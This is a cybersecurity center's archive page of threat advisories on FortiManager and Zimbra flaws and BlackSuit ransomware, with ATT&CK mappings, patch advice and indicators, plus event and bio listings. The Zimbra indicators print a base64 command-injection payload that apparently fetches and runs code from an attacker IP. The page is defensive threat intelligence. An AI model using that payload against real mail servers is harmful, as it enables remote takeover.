Sarina

About Sarina Gandy

This author has not yet filled in any details.
So far Sarina Gandy has created 127 blog entries.

Critical Vulnerability in Fortinet FortiManager Under Active Exploitation

I. Targeted Entities

  • Fortinet FortiManager Customer
  • Managed Service Providers

II. Introduction

A critical vulnerability has been identified in Fortinet's FortiManager platform, a centralized management solution for Fortinet security products. This vulnerability, tracked as CVE-2024-47575, allows for remote code execution (RCE) by unauthorized attackers. The exploitation of this vulnerability is currently active in the wild, posing a significant threat to affected organizations. If successfully exploited, attackers could gain access to critical systems, install malicious programs, and manipulate sensitive data. Fortinet and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories urging organizations to take immediate action by applying the latest patches to mitigate risks.

FortiManager is widely deployed across sectors, including government, telecommunications, financial services, and healthcare, making this vulnerability particularly concerning. Given the increasing sophistication of cyberattacks, unpatched systems present a high risk, allowing attackers to potentially escalate privileges and compromise network infrastructures.

III. Additional Background Information

In October 2024, a critical vulnerability was discovered in Fortinet's FortiManager, a network management solution widely used to centrally configure and monitor Fortinet devices. This vulnerability, tracked as CVE-2024-47575, exploits a missing authentication mechanism in the fgfmd daemon, allowing attackers to execute arbitrary code remotely without valid credentials. Fortinet and CISA have confirmed that malicious actors are actively targeting both on-premises and cloud-based instances of FortiManager through specially crafted requests, leveraging this flaw to compromise network environments.

The exploit is aligned with tactics defined in the MITRE ATT&CK framework, specifically T1190 – Exploit Public-Facing Application, indicating that adversaries are using exposed FortiManager instances as initial access points. Once inside, attackers can install backdoors, modify security configurations, and delete or manipulate data, depending on the privileges of the compromised service accounts. Higher-privileged accounts can allow attackers to escalate their control leading to significant disruptions.

Previous incidents involving vulnerabilities in network appliances highlight the severity of such attacks. FortiManager's broad adoption across multiple critical infrastructures and industries make it an attractive target. Unpatched instances are especially vulnerable to this exploit. Additionally, this vulnerability exposes connected Fortinet devices, allowing attackers to disable firewalls or VPNs and undermine network defenses.

Organizations are strongly advised to apply the latest patches immediately, perform vulnerability assessments, and monitor for indicators of compromise (IoC). Fortinet has released mitigation guidelines, emphasizing the importance of updating software, segmenting networks, and limiting administrative access to prevent further exploitation. Failure to act could result in severe operational disruptions and data breaches, particularly for critical infrastructure providers and enterprises that rely heavily on Fortinet's security infrastructure.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    Attackers exploit the public-facing FortiManager application via a missing authentication flaw. This vulnerability allows unauthorized attackers to execute arbitrary code on FortiManager by sending specially crafted requests, gaining initial access to the system and enabling control over FortiGate devices connected to the network.
  • T1078 – Valid Accounts
    The threat actors leverage valid certificates on unauthorized FortiManager and FortiGate devices, allowing them to register these devices on exposed FortiManager instances. By mimicking legitimate access, the attackers avoid raising immediate security alerts and maintain a low profile for further exploitation and lateral movement within the network.
  • T1036 – Masquerading
    Attackers register rogue FortiManager devices under misleading names (e.g., "localhost") and legitimate-seeming serial numbers (e.g., FMG-VMTM23017412). This technique helps obscure threat actor activity within FortiManager logs and console, allowing the attacker's device to appear as if it is part of the legitimate infrastructure.
  • T1041 – Exfiltration Over C2 Channel
    Exfiltration of FortiManager and FortiGate configuration files occurs over encrypted Command and Control (C2) channels, leveraging HTTPS to avoid detection by security tools. The threat actor UNC5820 has been observed using specific IP addresses to exfiltrate compressed files containing sensitive configuration information, user credentials, and device data.
  • T1587.003 – Develop Capabilities: Digital Certificates
    Attackers leverage valid digital certificates on FortiManager and FortiGate devices to masquerade malicious activities as legitimate. With these certificates, unauthorized devices can connect to FortiManager, bypassing certain security configurations and enabling persistent access to compromised networks.
  • T1562.001 – Impair Defenses: Disable or Modify Tools
    Attackers modify FortiManager configuration to evade detection. By using commands such as fgfm-deny-unknown, attackers can prevent detection of unauthorized devices. This adjustment allows attackers to sustain their unauthorized access, mitigating the chances of detection during ongoing operations.
  • T1027 – Obfuscated Files or Information
    Attackers use gzip compression on the /tmp/.tm archive, which stores exfiltrated configuration data, to obfuscate and minimize visibility of extracted data. This technique reduces the file's detection footprint, making it harder to identify during data exfiltration stages.
  • T1040 – Network Sniffing
    While not directly observed in this incident, the configuration data exfiltrated includes sensitive details like IPs and credentials. This could indicate an intention to use network sniffing techniques or other credential-monitoring tactics to further penetrate or maintain persistence in the target network.

V. Immediate Recommendations

  • Install Security Updates:
    • Fortinet has solved CVE-2024-47575 with fixes. To address the found security flaw and reduce the risk of active exploitation, organizations should give top priority to installing these updates on all FortiManager instances, including on-premises and cloud-based.
  • Monitor for Compromise Indicators (IoCs):
    • Check network traffic and system logs often for known IoCs linked to this attack, such as file paths, flagged IP addresses, MD5 hash values, and log entries that might point to exploitation (see to the IoCs section for references). To improve detection capabilities, incorporate these IoCs into your SIEM or IDS/IPS.
  • Establish an Incident Response Plan:
    • Create or revise an incident response plan that includes steps for handling FortiManager vulnerability exploitation. Make sure your reaction team is equipped and trained to deal with any possible Fortinet system breaches.
  • Isolate Compromised Systems:
    • Isolate compromised systems right away to stop additional access or harm if any indications of compromise are found. Notify the affected parties and carry out a comprehensive investigation, eliminating any malware or backdoors.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP

45.32.41[.]202 
IP

195.85.114[.]78 
IP

104.238.141[.]143 
IP 158.247.199[.]37 
IP 45.32.63[.]2 
File /tmp/.tm 
File /var/tmp/.tm 
MD5 Hash of unreg_devices.txt  9DCFAB171580B52DEAE8703157012674 
Email address 0qsc137p[@]justdefinition.com 
Log Entry type=event,subtype=dvm,pri=information,desc=”Device,manager,generic,information,log”,user=”device,…“,msg=”Unregistered device localhost add succeeded” device=”localhost” adom=”FortiManagersession_id=0 operation=”Add device” performed_on=”localhost” changes=”Unregistered device localhost add succeeded” 
Log Entry type=event,subtype=dvm,pri=notice,desc=”Device,Manager,dvm,log,at,notice,level”,user=”System”,userfrom=”“,msg=”” adom=”root” session_id=0 operation=”Modify device” performed_on=”localhost” changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  msg=”Unregistered device localhost add succeeded” 
String revealing exploitation activity in /log/locallog/elog  changes=”Edited device settings (SN FMG-VMTM23017412)” 
String revealing exploitation activity in /log/locallog/elog  changes=”Added unregistered device to unregistered table. 

VII. References

The Channel CO, CRM (October 24, 2024) 5 Things To Know On The Fortinet FortiManager Attacks  https://www.crn.com/news/security/2024/5-things-to-know-on-the-fortinet-fortimanager-attacks
 

Bleeping Computer (October 23, 2024) Fortinet warns of new critical FortiManager flaw used in zero-day attacks
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/ 

Google Cloud (October 23, 2024) Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575) https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575 

 New York State (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://its.ny.gov/2024-120 

 Bleeping Computer (October 24, 2024) Mandiant says new Fortinet flaw has been exploited since June https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/ 

 CVE (October 23, 2024) CVE-2024-47575 https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2024-47575 

 Fortigaurd (October 17, 2024) Missing authentication in fgfmsd https://www.fortiguard.com/psirt/FG-IR-24-423 

 MS-ISAC (October 23, 2024) A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution https://learn.cisecurity.org/webmail/799323/2307481671/eb748002d95238b2d31f1dc45b527f271478b2fb5b4d5ee93eb20f05d2825fce

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker. 

Critical Vulnerability in Fortinet FortiManager Under Active Exploitation2024-11-12T12:00:23-05:00

Zimbra Collaboration RCE Vulnerability

I. Targeted Entities

  • Small to Medium Government and Business Entities

II. Introduction

A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra’s postjournal service, which processes incoming emails over SMTP. This vulnerability allows attackers to compromise servers by sending specially crafted emails that trigger arbitrary command execution through the server’s CC field. Once exploited, the vulnerability can be used to install web shells, providing attackers full access to the compromised server and enabling further network infiltration.

III. Additional Background Information

Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    • The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
  • T1505.003 – Server Software Component: Web Shell
    • The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
  • T1059.004 – Command and Scripting Interpreter: Unix Shell
    • The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
  • T1071.001 – Application Layer Protocol: Web Protocols
    • The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
  • T1105 – Ingress Tool Transfer
    • Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
  • T1132.001 – Data Encoding: Standard Encoding
    • The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    • The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.

V. Recommendations

  • Patch Management
    • Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
  • Monitoring and Logging
    • Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
  • Access Control
    • Properly configure Zimbra’s “mynetworks” parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization’s operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed
  • Service Management
    • Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
  • Vendor Communication

    • Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.

VI. IOCs (Indicators of Compromise)

Type Indicator
IP Address

79.124.49[.]86
Port

10027
Base64-encoded String

ppp’echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di shipppppp@mail.com

VII. References

Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now

BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/

SOCRadar. (October 02, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, Benjamin Price

Zimbra Collaboration RCE Vulnerability2024-10-28T11:58:24-04:00

chat:CYBR Podcast Episode 5: Joan Wooward

In this episode of chat:CYBR, James Jacobs and Jordan Deiuliis discuss the role of the Travelers Institute in public policy and cybersecurity with Joan Woodward, the president of the Institute. They explore the evolution of the Institute, the importance of cybersecurity awareness, and the intersection of cybersecurity and insurance. Joan shares insights from recent studies on CFO concerns regarding cybersecurity and emphasizes the need for proactive measures to mitigate risks. The conversation concludes with recommendations for policymakers to enhance cybersecurity strategies.

chat:CYBR Podcast Episode 5: Joan Wooward2025-02-18T12:20:12-05:00

Teaching Cybersecurity in a World of AI and Deep Fakes | Operation K12 Webinar

Join our Operation K12 team to explore Teaching Cybersecurity in a World of aI And Deep Fakes.

In this webinar, the University of Florida’s Dr. Nancy Ruzycki and Cyber Florida’s Operation K12 will explore how cyber teachers can bring in AI frameworks and tools in the cyber classroom.

This session will look at generative AI and deepfakes, and the role of cyber professionals in protecting consumers from misinformation.

Register to Join the Conversation:

Teaching Cybersecurity in a World of AI and Deep Fakes | Operation K12 Webinar2025-01-06T10:12:41-05:00

Mark Clancy

Vice President for Cybersecurity/CISO, Sprint, Inc.; Founder, Cyber Risk Management; former Managing Director for Technology Risk Management/CISO, Depository Trust and Clearing Corporation (DTCC).

Mark Clancy2024-09-25T14:41:21-04:00

Lt. Gen. Dennis Crall

CEO of Advance Foundry. DoD Joint Staff, former Chief Information Officer – Director Command, Control, Communications, and Cyber (C4). Former Senior Military Advisor to the Undersecretary of Defense for Policy and former Deputy Principal Cyber Advisory to the Secretary of Defense.

Lt. Gen. Dennis Crall2024-09-25T14:43:26-04:00

Christopher Day

VP Strategic Capabilities and Programs, Tenable. VP of Cognitive Cyber, ManTech, Member Defense Science Board, Chief Information Security Officer for Invincea, CTO for Packet Forensics, LLC and its subsidiaries; Senior Vice President, Secure Information Services for Terremark Worldwide, Inc.; and Vice President for SteelCloud. Co-founded The Asgard Group, and subsequently sold it to SteelCloud in 2004.

Christopher Day2024-09-25T14:42:47-04:00

Terry Roberts

Founder, President and CEO WhiteHawk CEC Inc., TASC VP for Cyber Engineering and Analytics, an Executive Director Carnegie Mellon University – Software Engineering Institute (CMU SEI), Deputy Director of Naval Intelligence CNO OPNAV, Director Requirements and Resources – Office of the Undersecretary of Defense for Intelligence.

Terry Roberts2024-10-28T16:21:55-04:00

Cybersecurity Workshop for Florida Critical Infrastructure

Join us on 29 October at the Tampa Palms Country Club for a dynamic cybersecurity workshop tailored to Florida’s critical infrastructure sectors.

This event will provide actionable recommendations for enhancing compliance with Florida Statute 282.318 and feature an overview of Cyber Florida’s no-cost solutions and services to strengthen your organization’s cyber defenses.

Participants will also engage in an exciting tabletop exercise hosted by the National Cybersecurity Preparedness Consortium (NUARI), offering hands-on experience in responding to cyber incidents. A free lunch will be provided, along with opportunities to network with cybersecurity experts and industry peers.

Don’t miss this chance to improve your cybersecurity posture and resilience!

Cybersecurity Workshop for Florida Critical Infrastructure2024-10-04T09:50:48-04:00

Blacksuit Ransomware Updated IOCs

I. Targeted Entities

  • Healthcare sector
  • Education sector
  • Government organizations
  • Manufacturing industries
  • Retail industries

II. Introduction

New Indicators of Compromise associated with BlackSuit ransomware have been found in recent attacks. BlackSuit is a sophisticated cyber threat known for its double extortion tactics, encrypting and exfiltrating victim data to demand ransom.

III. Additional Background Information

BlackSuit ransomware emerged as a prominent threat actor in the cyber landscape in 2023. It is believed to be a direct successor to the Royal ransomware, itself a descendant of the notorious Conti ransomware group. BlackSuit shares significant code similarities with Royal, including encryption algorithms and communication methods, indicating that the operators behind BlackSuit have inherited and improved upon Royal’s techniques. An analysis made by Trend Micro revealed that BlackSuit and Royal ransomware have a high degree of similarity, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps. Additionally, BlackSuit employs command-line arguments like those used by Royal, though with some variations and additional arguments.

This technical sophistication has allowed BlackSuit to conduct multiple high-profile attacks across various sectors since its emergence. Notably, one of the most significant attacks targeted a U.S.-based healthcare provider in October 2023, resulting in severe operational disruptions. The financial losses from this attack were estimated to be in the millions, including ransom payments and the cost of recovery and mitigation. In another incident, an educational institution suffered a data breach, leading to the exposure of sensitive student and staff information.

Financial gain is the primary motivation behind BlackSuit attacks. The group employs double extortion tactics, demanding ransom not only to decrypt the data but also to prevent the leaked data from being publicly released. This strategy increases the pressure on victims to pay the ransom, highlighting the ruthlessness and effectiveness of BlackSuit’s extortion methods.

Tools Used
  • Blacksuit ransomware: The main payload used for encrypting victim data.
  • Bravura Optitune: Legitimate remote monitoring and management (RMM) software used for maintaining remote access.
  • InfoStealer: Malware designed to steal sensitive information, including credentials and financial data.
  • NetScan: SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovering host names and network services.
  • Process Explorer: A Microsoft Sysinternals tool that provides detailed information about processes running on a system, used for monitoring and debugging.
  • ProcessHacker: A free tool for monitoring system resources, debugging software, and detecting malware.
  • PsKill: Microsoft Sysinternals command-line tool used to terminate Windows processes on local or remote systems.
  • PsSuspend: Microsoft Sysinternals command-line tool used to suspend processes on a local or remote system.
  • PsExec: A Microsoft Sysinternals tool for executing processes on other systems, primarily used by attackers for lateral movement.
  • Rclone (suspected): An open-source tool that can manage content in the cloud, often abused by ransomware actors to exfiltrate data from victim machines.

These tools allow BlackSuit to conduct reconnaissance, maintain persistence, and execute their ransomware effectively. The group’s preference for leveraging legitimate software tools makes their activities harder to detect and mitigate. Understanding the tools and methods employed by BlackSuit ransomware is critical for defending against their attacks.

IV. MITRE ATT&CK

  • T1057 – Process Discovery
    • BlackSuit ransomware operators use tools like Process Explorer to list and monitor active processes. This allows them to identify security software, such as antivirus or endpoint detection and response (EDR) tools, which they may attempt to disable to avoid detection and ensure the success of their attack.
  • T1059 – Command and Scripting Interpreter
    • BlackSuit ransomware leverages PowerShell scripts to execute commands and payloads on compromised systems. PowerShell is a powerful scripting language built into Windows, which allows for the automation of administrative tasks. By using PowerShell, attackers can download additional payloads, execute them, and carry out further malicious activities without raising immediate suspicion.
  • T1082 – System Information Discovery
    • BlackSuit may run commands to gather information about the system architecture, OS version, installed software, and hardware details. This information helps attackers tailor their payloads and strategies to the specific environment they are targeting, increasing the chances of a successful attack.
  • T1083 – File and Directory Discovery
    • BlackSuit ransomware may use commands or scripts to enumerate user directories, document folders, and network shares. This helps them identify valuable files to encrypt, maximizing the impact of their attack and increasing the likelihood that victims will pay the ransom to regain access to their data.
  • T1204 – User Execution
    • BlackSuit ransomware operators may send phishing emails with malicious attachments or links. These emails are crafted to appear legitimate, often posing as invoices, delivery notifications, or urgent messages that require immediate attention. When the recipient opens the attachment or clicks the link, the ransomware is executed, leading to the infection of their system.
  • T1486 – Data Encrypted for Impact
    • BlackSuit encrypts critical files on the victim’s system using strong encryption algorithms. After encryption, the attackers demand a ransom for the decryption key needed to restore access to the data. This not only disrupts the victim’s operations but also places them under significant pressure to pay the ransom to recover their data.
  • T1490 – Inhibit System Recovery
    • BlackSuit ransomware might delete Volume Shadow Copies on Windows systems. Volume Shadow Copies are backup snapshots created by the operating system that allow users to restore their data to a previous state. By deleting these backups, the attackers ensure that victims cannot easily recover their data without paying the ransom, thereby increasing the effectiveness of their extortion.

V. Recommendations

  • Hash Blacklisting and Detection Updates:
    • Maintain an up-to-date blacklist of known malicious file hashes associated with BlackSuit and other ransomware variants. Use threat intelligence feeds and security vendors’ databases to identify and block these malicious files at the network perimeter and endpoint levels. Ensure that antivirus and anti-malware solutions are set to receive regular updates for detecting new ransomware variants and their associated hashes. Promptly apply these updates to enhance your organization’s capability to detect and prevent ransomware infections.
  • Regular Backup and Disaster Recovery Planning:
    • Maintain regular backups of critical data and systems, and store them securely, preferably off-site or in a cloud environment with strong encryption. Develop and periodically test a comprehensive disaster recovery plan that includes procedures for restoring data and services in a cyberattack.
  • Implement Advanced Threat Intelligence and Information Sharing:
    • Subscribe to and actively monitor threat intelligence feeds for the latest information on vulnerabilities and threats. Participate in industry and government cybersecurity information-sharing programs to stay informed about emerging threats and best practices.
  • Enhance Incident Response and Forensic Capabilities:
    • Develop and maintain a robust incident response plan that includes procedures for containment, eradication, and recovery. Ensure that forensic capabilities are available to investigate and understand the nature and scope of any breach, to improve defenses and prevent future incidents.
  • Manage Default Accounts on Enterprise Assets and Software:
    • Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.

VI. IOCs (Indicators of Compromise)

File Name Description SHA-1 Hash Virus Total Detections
psexec.exe PsExec

078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b

 2
decryptor.exe Blacksuit Ransomware 141c7c7a2dea1be7304551a1fa0d4e4736e45b079f48eb8ff4c45d6a033b995a 51
netscan.exe NetScan 18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 32
sqlite.dll Suspected information-stealing malware 5c297d9d50d0a784f16ac545dd93a889f8f11bf37b29f8f6907220936ab9434f 38
pskill.exe PsKill 5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 1
rclone.exe Rclone d9a8c4fc94655f47a127b45c71e426d0f2057b6faf78fb7b86ee2995f7def41d 2
ProcessHacker.exe ProcessHacker bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 29
Network IOCs Virus Total Detections
185.73.125[.]96 10

VII. References

Blacksuit (2024) SentinelOne. Available at: https://www.sentinelone.com/anthology/blacksuit/ (Accessed: 08 June 2024).

Montalbano, E. (2024) BlackSuit claims dozens of victims with ransomware, BlackSuit Claims Dozens of Victims With Ransomware. Available at: https://www.darkreading.com/cyberattacks-data-breaches/blacksuit-dozens-victims-curated-ransomware (Accessed: 08 June 2024).

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Pagliaroni, Yousef Aref, Abdullah Siddiqi, and Nahyan Jamil.

Blacksuit Ransomware Updated IOCs2024-07-24T13:34:43-04:00

CONTACT US

Cyber Florida at USF
4202 E. Fowler Avenue, ISA7020
Tampa, FL 33620

Office meetings by appointment only

PRIVACY POLICY

Copyright 2026 The Florida Center for Cybersecurity at the University of South Florida. Information on this website is made available for general educational purposes only and should not be used in lieu of obtaining competent legal advice from a licensed attorney or cybersecurity professional with sufficient expertise necessary to address your specific needs. Use of this website does not create any special or fiduciary relationship between you and the Florida Center for Cybersecurity or the University of South Florida.